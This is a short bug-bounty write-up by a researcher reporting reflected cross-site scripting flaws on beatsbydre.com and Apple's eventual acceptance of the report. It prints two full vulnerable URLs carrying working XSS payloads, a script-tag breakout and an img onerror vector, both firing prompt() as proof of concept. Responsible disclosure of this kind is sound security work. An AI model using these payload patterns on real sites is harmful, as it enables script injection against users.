XSS in Beatsbydre.com

In 2014 Apple Acquired Beats. Just after acquisition I thought of testing it. So I ended up finding multiple XSS in their main domain http://beatsbydre.com. 

So what was next?? other than reporting the Bug

Vulnerable Links were like below


http://www.beatsbydre.com/earphones/tour/red/900-00101-01.html?maxLimitError=--></

SCRIPT>">'><SCRIPT>prompt(String.fromCharCode(34, 120, 115, 115, 32, 98, 121, 32, 77, 117, 104, 97, 109, 109, 97, 100, 32, 32, 65, 98, 100, 117, 108, 108, 97, 104, 34))</SCRIPT>



http://www.beatsbydre.com/headphones/mixr/beats-mixr.html?bvrrp=9218-en_us/reviews/product/5/beats-mixr.htm&icid="><img src=1 onerror=prompt(document.domain);>//

 

Simple Vectors were used...

 

At First Apple refused to address the Vulnerability

 

 

But later on they accepted the report.

 

As per Apple's Policy Only HOF was offered as a reward..

 

 

Muhammad Abdullah